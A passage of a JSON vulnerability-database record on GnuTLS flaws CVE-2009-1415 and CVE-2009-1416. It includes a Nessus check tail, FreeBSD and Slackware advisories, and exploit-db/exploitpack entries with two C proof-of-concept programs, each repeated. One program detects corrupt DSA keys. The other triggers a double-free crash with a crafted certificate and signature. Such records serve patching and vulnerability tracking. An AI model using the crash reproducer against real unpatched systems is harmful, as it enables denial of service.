reference:\"lib64gnutls13-2.0.0-2.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libgnutls-devel-2.0.0-2.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libgnutls13-2.0.0-2.4mdv2008.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:12", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1415", "CVE-2009-1416", "CVE-2009-1417"], "description": "\nSecurityFocus reports:\n\nGnuTLS is prone to multiple remote vulnerabilities:\n\nA remote code-execution vulnerability.\nA denial-of-service vulnerability.\nA signature-generation vulnerability.\nA signature-verification vulnerability.\n\nAn attacker can exploit these issues to potentially execute\n\t arbitrary code, trigger denial-of-service conditions, carry\n\t out attacks against data signed with weak signatures, and\n\t cause clients to accept expired or invalid certificates from\n\t servers.\n\n", "edition": 4, "modified": "2009-05-21T00:00:00", "published": "2009-05-21T00:00:00", "id": "B31A1088-460F-11DE-A11A-0022156E8794", "href": "https://vuxml.freebsd.org/freebsd/b31a1088-460f-11de-a11a-0022156e8794.html", "title": "GnuTLS -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2019-05-30T07:37:01", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1415", "CVE-2009-1416"], "description": "New gnutls packages are available for Slackware 12.0, 12.1, 12.2, and -current\nto fix security issues.\n\nMore details about the issues may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1415\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1416\n\n\nHere are the details from the Slackware 12.2 ChangeLog:\n\npatches/packages/gnutls-2.6.2-i486-2_slack12.2.tgz\n Patched the following security issues:\n - Corrected double free on signature verification failure.\n Reported by Miroslav Kratochvil <exa.exa@gmail.com>.\n - Noticed when investigating the previous GNUTLS-SA-2009-1 problem.\n All DSA keys generated using GnuTLS 2.6.x are corrupt.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1415\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1416\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/gnutls-2.6.2-i486-2_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/gnutls-2.6.2-i486-2_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/gnutls-2.6.2-i486-2_slack12.2.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/gnutls-2.6.6-i486-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\n0028d3e43ed87ae20cfd5264676d86ba gnutls-2.6.2-i486-2_slack12.0.tgz\n\nSlackware 12.1 package:\nc5a62819b7ef93ee41ed4c05d6f56c02 gnutls-2.6.2-i486-2_slack12.1.tgz\n\nSlackware 12.2 package:\neb930f4c0361e4e0bd24044a3c386ce7 gnutls-2.6.2-i486-2_slack12.2.tgz\n\nSlackware -current package:\nc277628054339e0c999daabb94b5a7fb gnutls-2.6.6-i486-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg gnutls-2.6.2-i486-2_slack12.2.tgz", "modified": "2009-05-09T13:05:09", "published": "2009-05-09T13:05:09", "id": "SSA-2009-128-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.405571", "type": "slackware", "title": "gnutls", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T18:11:14", "description": "GnuTLS 2.6.x libgnutls lib/gnutls_pk.c DSA Key Storage Remote Spoofing. CVE-2009-1416. Remote exploit for linux platform", "published": "2009-04-30T00:00:00", "type": "exploitdb", "title": "GnuTLS 2.6.x libgnutls lib/gnutls_pk.c DSA Key Storage Remote Spoofing", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1416"], "modified": "2009-04-30T00:00:00", "id": "EDB-ID:32965", "href": "https://www.exploit-db.com/exploits/32965/", "sourceData": "source: http://www.securityfocus.com/bid/34783/info\r\n \r\nGnuTLS is prone to multiple remote vulnerabilities:\r\n \r\n- A remote code-execution vulnerability\r\n- A denial-of-service vulnerability\r\n- A signature-generation vulnerability\r\n- A signature-verification vulnerability\r\n \r\nAn attacker can exploit these issues to potentially execute arbitrary code, trigger denial-of-service conditions, carry out attacks against data signed with weak signatures, and cause clients to accept expired or invalid certificates from servers.\r\n \r\nVersions prior to GnuTLS 2.6.6 are vulnerable.\r\n\r\n/*\r\n * Small code to reproduce the CVE-2009-1416 bad DSA key problem.\r\n *\r\n * Build it using:\r\n *\r\n * gcc -o cve-2009-1416 cve-2009-1416.c -lgnutls\r\n *\r\n * If your gnutls library is OK then running it will print 'success!'.\r\n *\r\n * If your gnutls library is buggy then running it will print 'buggy'.\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdarg.h>\r\n#include <stdlib.h>\r\n\r\n#include <gcrypt.h>\r\n#include <gnutls/gnutls.h>\r\n\r\nint\r\nmain (void)\r\n{\r\n gnutls_x509_privkey_t key;\r\n gnutls_datum_t p, q, g, y, x;\r\n int ret;\r\n\r\n gnutls_global_init ();\r\n gcry_control (GCRYCTL_ENABLE_QUICK_RANDOM, 0);\r\n\r\n ret = gnutls_x509_privkey_init (&key);\r\n if (ret < 0)\r\n return 1;\r\n\r\n ret = gnutls_x509_privkey_generate (key, GNUTLS_PK_DSA, 512, 0);\r\n if (ret < 0)\r\n return 1;\r\n\r\n ret = gnutls_x509_privkey_export_dsa_raw (key, &p, &q, &g, &y, &x);\r\n if (ret < 0)\r\n return 1;\r\n\r\n if (q.size == 3 && memcmp (q.data, \"\\x01\\x00\\x01\", 3) == 0)\r\n printf (\"buggy\\n\");\r\n else\r\n printf (\"success!\\n\");\r\n\r\n gnutls_free (p.data);\r\n gnutls_free (q.data);\r\n gnutls_free (g.data);\r\n gnutls_free (y.data);\r\n gnutls_free (x.data);\r\n\r\n gnutls_x509_privkey_deinit (key);\r\n gnutls_global_deinit ();\r\n\r\n return 0;\r\n}\r\n\r\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/32965/"}, {"lastseen": "2016-02-03T18:11:05", "description": "GnuTLS 2.6.x libgnutls lib/pk-libgcrypt.c Malformed DSA Key Handling Remote DoS. CVE-2009-1415. Dos exploit for linux platform", "published": "2009-04-30T00:00:00", "type": "exploitdb", "title": "GnuTLS 2.6.x libgnutls lib/pk-libgcrypt.c Malformed DSA Key Handling Remote DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1415"], "modified": "2009-04-30T00:00:00", "id": "EDB-ID:32964", "href": "https://www.exploit-db.com/exploits/32964/", "sourceData": "source: http://www.securityfocus.com/bid/34783/info\r\n\r\nGnuTLS is prone to multiple remote vulnerabilities:\r\n\r\n- A remote code-execution vulnerability\r\n- A denial-of-service vulnerability\r\n- A signature-generation vulnerability\r\n- A signature-verification vulnerability\r\n\r\nAn attacker can exploit these issues to potentially execute arbitrary code, trigger denial-of-service conditions, carry out attacks against data signed with weak signatures, and cause clients to accept expired or invalid certificates from servers.\r\n\r\nVersions prior to GnuTLS 2.6.6 are vulnerable. \r\n\r\n/*\r\n * Small code to reproduce the CVE-2009-1415 double-free problem.\r\n *\r\n * Build it using:\r\n *\r\n * gcc -o cve-2009-1415 cve-2009-1415.c -lgnutls\r\n *\r\n * If your gnutls library is OK then running it will just print 'success!'.\r\n *\r\n * If your gnutls library is buggy, then running it will crash like this:\r\n *\r\n * ** glibc detected *** ./cve-2009-1415: munmap_chunk(): invalid pointer: 0xb7f80a9c ***\r\n * ======= Backtrace: =========\r\n * ...\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdarg.h>\r\n#include <stdlib.h>\r\n\r\n#include <gnutls/gnutls.h>\r\n\r\nstatic char dsa_cert[] =\r\n \"-----BEGIN CERTIFICATE-----\\n\"\r\n \"MIIDbzCCAtqgAwIBAgIERiYdRTALBgkqhkiG9w0BAQUwGTEXMBUGA1UEAxMOR251\\n\"\r\n \"VExTIHRlc3QgQ0EwHhcNMDcwNDE4MTMyOTQxWhcNMDgwNDE3MTMyOTQxWjA3MRsw\\n\"\r\n \"GQYDVQQKExJHbnVUTFMgdGVzdCBzZXJ2ZXIxGDAWBgNVBAMTD3Rlc3QuZ251dGxz\\n\"\r\n \"Lm9yZzCCAbQwggEpBgcqhkjOOAQBMIIBHAKBgLmE9VqBvhoNxYpzjwybL5u2DkvD\\n\"\r\n \"dBp/ZK2d8yjFoEe8m1dW8ZfVfjcD6fJM9OOLfzCjXS+7oaI3wuo1jx+xX6aiXwHx\\n\"\r\n \"IzYr5E8vLd2d1TqmOa96UXzSJY6XdM8exXtLdkOBBx8GFLhuWBLhkOI3b9Ib7GjF\\n\"\r\n \"WOLmMOBqXixjeOwHAhSfVoxIZC/+jap6bZbbBF0W7wilcQKBgGIGfuRcdgi3Rhpd\\n\"\r\n \"15fUKiH7HzHJ0vT6Odgn0Zv8J12nCqca/FPBL0PCN8iFfz1Mq12BMvsdXh5UERYg\\n\"\r\n \"xoBa2YybQ/Dda6D0w/KKnDnSHHsP7/ook4/SoSLr3OCKi60oDs/vCYXpNr2LelDV\\n\"\r\n \"e/clDWxgEcTvcJDP1hvru47GPjqXA4GEAAKBgA+Kh1fy0cLcrN9Liw+Luin34QPk\\n\"\r\n \"VfqymAfW/RKxgLz1urRQ1H+gDkPnn8l4EV/l5Awsa2qkNdy9VOVgNpox0YpZbmsc\\n\"\r\n \"ur0uuut8h+/ayN2h66SD5out+vqOW9c3yDI+lsI+9EPafZECD7e8+O+P90EAXpbf\\n\"\r\n \"DwiW3Oqy6QaCr9Ivo4GTMIGQMAwGA1UdEwEB/wQCMAAwGgYDVR0RBBMwEYIPdGVz\\n\"\r\n \"dC5nbnV0bHMub3JnMBMGA1UdJQQMMAoGCCsGAQUFBwMBMA8GA1UdDwEB/wQFAwMH\\n\"\r\n \"gAAwHQYDVR0OBBYEFL/su87Y6HtwVuzz0SuS1tSZClvzMB8GA1UdIwQYMBaAFOk8\\n\"\r\n \"HPutkm7mBqRWLKLhwFMnyPKVMAsGCSqGSIb3DQEBBQOBgQBCsrnfD1xzh8/Eih1f\\n\"\r\n \"x+M0lPoX1Re5L2ElHI6DJpHYOBPwf9glwxnet2+avzgUQDUFwUSxOhodpyeaACXD\\n\"\r\n \"o0gGVpcH8sOBTQ+aTdM37hGkPxoXjtIkR/LgG5nP2H2JRd5TkW8l13JdM4MJFB4W\\n\"\r\n \"QcDzQ8REwidsfh9uKAluk1c/KQ==\\n\"\r\n \"-----END CERTIFICATE-----\\n\";\r\n\r\nconst gnutls_datum_t dsa_cert_dat = {\r\n dsa_cert, sizeof (dsa_cert)\r\n};\r\n\r\nint\r\nmain (void)\r\n{\r\n gnutls_x509_crt_t crt;\r\n gnutls_datum_t data = { \"foo\", 3 };\r\n gnutls_datum_t sig = { \"bar\", 3 };\r\n int ret;\r\n\r\n gnutls_global_init ();\r\n\r\n ret = gnutls_x509_crt_init (&crt);\r\n if (ret < 0)\r\n return 1;\r\n\r\n ret = gnutls_x509_crt_import (crt, &dsa_cert_dat, GNUTLS_X509_FMT_PEM);\r\n if (ret < 0)\r\n return 1;\r\n\r\n ret = gnutls_x509_crt_verify_data (crt, 0, &data, &sig);\r\n if (ret < 0)\r\n return 1;\r\n\r\n printf (\"success!\\n\");\r\n\r\n gnutls_x509_crt_deinit (crt);\r\n gnutls_global_deinit ();\r\n\r\n return 0;\r\n}\r\n\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/32964/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:18", "description": "\nGnuTLS 2.6.x - libgnutls libgnutls_pk.c DSA Key Storage Remote Spoofing", "edition": 1, "published": "2009-04-30T00:00:00", "title": "GnuTLS 2.6.x - libgnutls libgnutls_pk.c DSA Key Storage Remote Spoofing", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1416"], "modified": "2009-04-30T00:00:00", "id": "EXPLOITPACK:72F8544C2F7BFB496FA55A540F3A8CB9", "href": "", "sourceData": "// source: https://www.securityfocus.com/bid/34783/info\n \nGnuTLS is prone to multiple remote vulnerabilities:\n \n- A remote code-execution vulnerability\n- A denial-of-service vulnerability\n- A signature-generation vulnerability\n- A signature-verification vulnerability\n \nAn attacker can exploit these issues to potentially execute arbitrary code, trigger denial-of-service conditions, carry out attacks against data signed with weak signatures, and cause clients to accept expired or invalid certificates from servers.\n \nVersions prior to GnuTLS 2.6.6 are vulnerable.\n\n/*\n * Small code to reproduce the CVE-2009-1416 bad DSA key problem.\n *\n * Build it using:\n *\n * gcc -o cve-2009-1416 cve-2009-1416.c -lgnutls\n *\n * If your gnutls library is OK then running it will print 'success!'.\n *\n * If your gnutls library is buggy then running it will print 'buggy'.\n *\n */\n\n#include <stdio.h>\n#include <stdarg.h>\n#include <stdlib.h>\n\n#include <gcrypt.h>\n#include <gnutls/gnutls.h>\n\nint\nmain (void)\n{\n gnutls_x509_privkey_t key;\n gnutls_datum_t p, q, g, y, x;\n int ret;\n\n gnutls_global_init ();\n gcry_control (GCRYCTL_ENABLE_QUICK_RANDOM, 0);\n\n ret = gnutls_x509_privkey_init (&key);\n if (ret < 0)\n return 1;\n\n ret = gnutls_x509_privkey_generate (key, GNUTLS_PK_DSA, 512, 0);\n if (ret < 0)\n return 1;\n\n ret = gnutls_x509_privkey_export_dsa_raw (key, &p, &q, &g, &y, &x);\n if (ret < 0)\n return 1;\n\n if (q.size == 3 && memcmp (q.data, \"\\x01\\x00\\x01\", 3) == 0)\n printf (\"buggy\\n\");\n else\n printf (\"success!\\n\");\n\n gnutls_free (p.data);\n gnutls_free (q.data);\n gnutls_free (g.data);\n gnutls_free (y.data);\n gnutls_free (x.data);\n\n gnutls_x509_privkey_deinit (key);\n gnutls_global_deinit ();\n\n return 0;\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:18", "description": "\nGnuTLS 2.6.x - libgnutls libpk-libgcrypt.c Malformed DSA Key Handling Remote Denial of Service", "edition": 1, "published": "2009-04-30T00:00:00", "title": "GnuTLS 2.6.x - libgnutls libpk-libgcrypt.c Malformed DSA Key Handling Remote Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1415"], "modified": "2009-04-30T00:00:00", "id": "EXPLOITPACK:F44C5C7EC320E10F866BF043291D8D2C", "href": "", "sourceData": "// source: https://www.securityfocus.com/bid/34783/info\n\nGnuTLS is prone to multiple remote vulnerabilities:\n\n- A remote code-execution vulnerability\n- A denial-of-service vulnerability\n- A signature-generation vulnerability\n- A signature-verification vulnerability\n\nAn attacker can exploit these issues to potentially execute arbitrary code, trigger denial-of-service conditions, carry out attacks against data signed with weak signatures, and cause clients to accept expired or invalid certificates from servers.\n\nVersions prior to GnuTLS 2.6.6 are vulnerable. \n\n/*\n * Small code to reproduce the CVE-2009-1415 double-free problem.\n *\n * Build it using:\n *\n * gcc -o cve-2009-1415 cve-2009-1415.c -lgnutls\n *\n * If your gnutls library is OK then running it will just print 'success!'.\n *\n * If your gnutls library is buggy, then running it will crash like this:\n *\n * ** glibc detected *** ./cve-2009-1415: munmap_chunk(): invalid pointer: 0xb7f80a9c ***\n * ======= Backtrace: =========\n * ...\n */\n\n#include <stdio.h>\n#include <stdarg.h>\n#include <stdlib.h>\n\n#include <gnutls/gnutls.h>\n\nstatic char dsa_cert[] =\n \"-----BEGIN CERTIFICATE-----\\n\"\n \"MIIDbzCCAtqgAwIBAgIERiYdRTALBgkqhkiG9w0BAQUwGTEXMBUGA1UEAxMOR251\\n\"\n \"VExTIHRlc3QgQ0EwHhcNMDcwNDE4MTMyOTQxWhcNMDgwNDE3MTMyOTQxWjA3MRsw\\n\"\n \"GQYDVQQKExJHbnVUTFMgdGVzdCBzZXJ2ZXIxGDAWBgNVBAMTD3Rlc3QuZ251dGxz\\n\"\n \"Lm9yZzCCAbQwggEpBgcqhkjOOAQBMIIBHAKBgLmE9VqBvhoNxYpzjwybL5u2DkvD\\n\"\n \"dBp/ZK2d8yjFoEe8m1dW8ZfVfjcD6fJM9OOLfzCjXS+7oaI3wuo1jx+xX6aiXwHx\\n\"\n \"IzYr5E8vLd2d1TqmOa96UXzSJY6XdM8exXtLdkOBBx8GFLhuWBLhkOI3b9Ib7GjF\\n\"\n \"WOLmMOBqXixjeOwHAhSfVoxIZC/+jap6bZbbBF0W7wilcQKBgGIGfuRcdgi3Rhpd\\n\"\n \"15fUKiH7HzHJ0vT6Odgn0Zv8J12nCqca/FPBL0PCN8iFfz1Mq12BMvsdXh5UERYg\\n\"\n \"xoBa2YybQ/Dda6D0w/KKnDnSHHsP7/ook4/SoSLr3OCKi60oDs/vCYXpNr2LelDV\\n\"\n \"e/clDWxgEcTvcJDP1hvru47GPjqXA4GEAAKBgA+Kh1fy0cLcrN9Liw+Luin34QPk\\n\"\n \"VfqymAfW/RKxgLz1urRQ1H+gDkPnn8l4EV/l5Awsa2qkNdy9VOVgNpox0YpZbmsc\\n\"\n \"ur0uuut8h+/ayN2h66SD5out+vqOW9c3yDI+lsI+9EPafZECD7e8+O+P90EAXpbf\\n\"\n \"DwiW3Oqy6QaCr9Ivo4GTMIGQMAwGA1UdEwEB/wQCMAAwGgYDVR0RBBMwEYIPdGVz\\n\"\n \"dC5nbnV0bHMub3JnMBMGA1UdJQQMMAoGCCsGAQUFBwMBMA8GA1UdDwEB/wQFAwMH\\n\"\n \"gAAwHQYDVR0OBBYEFL/su87Y6HtwVuzz0SuS1tSZClvzMB8GA1UdIwQYMBaAFOk8\\n\"\n \"HPutkm7mBqRWLKLhwFMnyPKVMAsGCSqGSIb3DQEBBQOBgQBCsrnfD1xzh8/Eih1f\\n\"\n \"x+M0lPoX1Re5L2ElHI6DJpHYOBPwf9glwxnet2+avzgUQDUFwUSxOhodpyeaACXD\\n\"\n \"o0gGVpcH8sOBTQ+aTdM37hGkPxoXjtIkR/LgG5nP2H2JRd5TkW8l13JdM4MJFB4W\\n\"\n \"QcDzQ8REwidsfh9uKAluk1c/KQ==\\n\"\n \"-----END CERTIFICATE-----\\n\";\n\nconst gnutls_datum_t dsa_cert_dat = {\n dsa_cert, sizeof (dsa_cert)\n};\n\nint\nmain (void)\n{\n gnutls_x509_crt_t crt;\n gnutls_datum_t data = { \"foo\", 3 };\n gnutls_datum_t sig = { \"bar\", 3 };\n int ret;\n\n gnutls_global_init ();\n\n ret = gnutls_x509_crt_init (&crt);\n if (ret < 0)\n return 1;\n\n ret = gnutls_x509_crt_import (crt, &dsa_cert_dat, GNUTLS_X509_FMT_PEM);\n if (ret < 0)\n return 1;\n\n ret = gnutls_x509_crt_verify_data (crt, 0, &data, &sig);\n if (ret < 0)\n return 1;\n\n printf (\"success!\\n\");\n\n gnutls_x509_crt_deinit (crt);\n gnutls_global_deinit ();\n\n return 0;\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}]}